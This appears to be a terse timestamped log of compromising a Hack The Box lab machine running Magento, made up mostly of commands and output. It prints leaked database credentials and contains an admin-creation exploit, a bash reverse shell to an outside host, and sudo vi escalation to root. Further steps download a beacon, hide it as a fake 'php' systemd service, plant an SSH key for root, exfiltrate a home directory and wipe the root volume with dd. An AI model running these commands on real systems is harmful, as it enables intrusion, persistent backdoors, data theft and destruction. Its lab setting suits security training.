2025-04-06T06:56:22-04:00

sudo apt install -y nmap curl python3-venv make zip unzip
sudo openvpn --config htb.ovpn

### T1 10.129.232.125

ping -c 1 10.129.232.125
nmap -sV -T4 10.129.232.125

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

up, ports open

magneto software
10.129.232.125 swagshop.htb
curl -L http://swagshop.htb/app/etc/local.xml


python3 cli.py repl
set --target 10.129.232.125 

    🏁 Done! Here's what we found:
    Install Date: Wed, 08 May 2019 07:23:09 +0000
    Hostname: localhost
    Username: root
    Password: fMVWh7bDHpgZkyfqQXreTjU9
    Database Name: swagshop
    Crypt Key: b355a9e0cd018d3f7f03607141518419

python3 poc.py http://swagshop.htb
create-user --username ypwq --password 123

    🛶 Attempting to create a new user with the following creds:
    username: ypwq
    password: 123
    🏁 Worked! Check 10.129.232.125/admin with creds ypwq:123
    👉 Set username to ypwq and password to 123

2025-04-06T07:05:09-04:00

python3 -m venv venv
source venv/bin/activate
python3 -m pip install mechanize
nc -l -p 4444
python3 exp.py http://swagshop.htb/index.php/admin "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.153/443 0>&1'"
2025-04-06T07:28:47-04:00

sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

sudo /usr/bin/vi /var/www/html/php.ini.sample -c ':!/bin/bash'
uid=0(root) gid=0(root) groups=0(root)
2025-04-06T07:29:51-04:00

generate beacon  --http http://10.10.16.153:4444 --seconds 20 --os linux
http --lport 4444

curl -s -L http://10.10.16.153:8080/php -o /usr/sbin/php
chmod +x /usr/sbin/php
/usr/sbin/php
2025-04-06T07:38:36-04:00

root_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDs7DvQgMbj9jJ7hsotTmY6yE8JEg4ky/vOqcKEG3HMCb019D8hE/xMgsIsne5tXK4PRu7P41M4Vgkl+CKqKU61bAimLo9FvG7Q6RTx0A1WpzejCr7MDna7h2UiahiNFU2cbVEiJxmdh1xTNB0WmZUeIJ8K9mFt0YACYK9ze382EUzH1rLJDxoDS9ahBThcHjK3aGcduHmQ+PQwa4rBzyt5FBArHT14BlZ8hwAw1X8VlY7+pDW+CzC1z6tJ81iXqKHE8r31WIeiIOAMZhKeSPBv/18bxi9bdVTk6MJ3HE6P9eiMYSP45maSJxdaQdx5kyCQSsCMzArUIyNSXnxK1sEGAtuPXwNCfp6M8BspHSPtVl0L83dQrvnd2ZyamBYK6skRNuU27nxmq5BVFa2Og0hmujvYnFniFCfCPjRAGl628Y/6nYs87xO0IrnM8WIUsGK0y+QESSr1sQN0SV2ETTHkSg49Omn5mV9bT9l5xEgM6xyVFyWrV/0dld+rUc24+As=

mkdir /root/.ssh/
upload /home/user/swag/2025-04-06/out/root_rsa.pub /root/.ssh/authorized_keys
chmod /root/.ssh/authorized_keys 0400

cat /etc/ssh/sshd_config
#PermitRootLogin prohibit-password

ssh -vvv root@10.129.232.125 -i out/root_rsa -T /bin/bash
2025-04-06T07:44:04-04:00

mv /tmp/.php /usr/sbin/php

php service
    [Unit]
    Description=php service
    After=network.target

    [Service]
    Type=simple
    Restart=always
    RestartSec=1
    ExecStart=/usr/sbin/php

    [Install]
    WantedBy=multi-user.target

upload -o /home/user/swag/2025-04-06/out/php.service /lib/systemd/system/php.service
execute systemctl daemon-reload
execute systemctl enable php.service
execute systemctl start php.service
2025-04-06T07:48:54-04:00

find
download /home/haris/ -r

/bin/dd if=/dev/zero of=/dev/mapper/swagshop--vg-root
 2641   2415   root               x86_64   /bin/dd
2025-04-06T08:06:25-04:00

terminate -F 1
2025-04-06T08:12:04-04:00

all processes and services non-responsive
2025-04-06T08:20:52-04:00